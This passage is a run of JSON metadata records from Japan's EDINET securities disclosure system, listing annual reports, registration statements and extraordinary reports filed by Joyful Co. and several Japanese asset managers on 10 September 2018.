"docID": "S100E2S2",
"edinetCode": "E03196",
"secCode": "99420",
"JCN": "3320001001417",
"filerName": "株式会社ジョイフル",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "030000",
"docTypeCode": "120",
"periodStart": "2018-01-01",
"periodEnd": "2018-06-30",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "有価証券報告書-第44期(平成30年1月1日-平成30年6月30日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 8,
"docID": "S100DQ2W",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11931",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:00",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第4期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 9,
"docID": "S100E2S0",
"edinetCode": "E03196",
"secCode": "99420",
"JCN": "3320001001417",
"filerName": "株式会社ジョイフル",
"fundCode": null,
"ordinanceCode": "015",
"formCode": "010000",
"docTypeCode": "235",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "内部統制報告書-第44期(平成30年1月1日-平成30年6月30日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 10,
"docID": "S100E017",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11833",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 11,
"docID": "S100E1EQ",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05322",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:01",
"docDescription": "半期報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 12,
"docID": "S100E1J8",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G12523",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 13,
"docID": "S100E293",
"edinetCode": "E12434",
"secCode": null,
"JCN": "7010001031160",
"filerName": "損保ジャパン日本興亜アセットマネジメント株式会社",
"fundCode": "G04199",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 14,
"docID": "S100E2RY",
"edinetCode": "E03196",
"secCode": "99420",
"JCN": "3320001001417",
"filerName": "株式会社ジョイフル",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:01",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 15,
"docID": "S100E0GT",
"edinetCode": "E06748",
"secCode": null,
"JCN": "2010001049257",
"filerName": "大和証券投資信託委託株式会社",
"fundCode": "G12816",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:02",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100BVMG",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 16,
"docID": "S100D9BE",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11902",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:02",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第5期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 17,
"docID": "S100E0DK",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12670",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:02",
"docDescription": "半期報告書(内国投資信託受益証券)-第2期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 18,
"docID": "S100E297",
"edinetCode": "E12434",
"secCode": null,
"JCN": "7010001031160",
"filerName": "損保ジャパン日本興亜アセットマネジメント株式会社",
"fundCode": "G08431",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:02",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 19,
"docID": "S100E1KP",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05301",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CHWN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 20,
"docID": "S100E23A",
"edinetCode": "E06748",
"secCode": null,
"JCN": "2010001049257",
"filerName": "大和証券投資信託委託株式会社",
"fundCode": "G01878",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 21,
"docID": "S100DMDK",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11931",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 22,
"docID": "S100E060",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11902",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:03",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 23,
"docID": "S100E2NC",
"edinetCode": "E13000",
"secCode": null,
"JCN": "4010001069955",
"filerName": "フランクリン・テンプルトン・インベストメンツ株式会社",
"fundCode": "G08227",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-21",
"periodEnd": "2018-06-20",
"submitDateTime": "2018-09-10 09:03",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第15期(平成29年12月21日-平成30年6月20日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 24,
"docID": "S100E1DQ",
"edinetCode": "E12430",
"secCode": null,
"JCN": "8010401072159",
"filerName": "日興アセットマネジメント株式会社",
"fundCode": "G01725",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:04",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 25,
"docID": "S100E1J6",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G12523",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:04",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第1期(平成29年6月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 26,
"docID": "S100E0DL",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12670",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:04",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 27,
"docID": "S100E1KQ",
"edinetCode": "E14561",
"secCode": null,
"JCN": "1013301022479",
"filerName": "セゾン投信株式会社",
"fundCode": "G05322",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:04",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CHWO",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 28,
"docID": "S100DYLA",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11003",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:05",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第10期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 29,
"docID": "S100E1X8",
"edinetCode": "E08957",
"secCode": null,
"JCN": "4010401049128",
"filerName": "三井住友アセットマネジメント株式会社",
"fundCode": "G05610",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:05",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 30,
"docID": "S100DZYZ",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G05418",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 31,
"docID": "S100DZZ1",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G05418",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第22期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 32,
"docID": "S100DYLB",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11003",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 33,
"docID": "S100DQ2Z",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11932",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第2期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 34,
"docID": "S100DZYV",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G03651",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:07",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 35,
"docID": "S100E0DO",
"edinetCode": "E11776",
"secCode": null,
"JCN": "9010001065933",
"filerName": "あいグローバル・アセット・マネジメント株式会社",
"fundCode": "G09373",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:07",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 36,
"docID": "S100DZLX",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G07774",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:07",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 37,
"docID": "S100E2J2",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G07438",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:07",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第18期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 38,
"docID": "S100DZM0",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G07774",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:08",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第17期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 39,
"docID": "S100DPGZ",
"edinetCode": "E12441",
"secCode": null,
"JCN": "3010001062358",
"filerName": "岡三アセットマネジメント株式会社",
"fundCode": "G02004",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:08",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 40,
"docID": "S100E2RI",
"edinetCode": "E30689",
"secCode": null,
"JCN": "4010001158535",
"filerName": "あおぞら投信株式会社",
"fundCode": "G10831",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:08",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CIPK",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 41,
"docID": "S100DZJT",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10987",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:08",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 42,
"docID": "S100E1X9",
"edinetCode": "E08957",
"secCode": null,
"JCN": "4010401049128",
"filerName": "三井住友アセットマネジメント株式会社",
"fundCode": "G05610",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-14",
"periodEnd": "2018-06-13",
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第21期(平成29年12月14日-平成30年6月13日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 43,
"docID": "S100DPH0",
"edinetCode": "E12441",
"secCode": null,
"JCN": "3010001062358",
"filerName": "岡三アセットマネジメント株式会社",
"fundCode": "G08304",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 44,
"docID": "S100DZSQ",
"edinetCode": "E06433",
"secCode": null,
"JCN": "3010001034076",
"filerName": "東京海上アセットマネジメント株式会社",
"fundCode": "G10742",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 45,
"docID": "S100DMDM",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11932",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
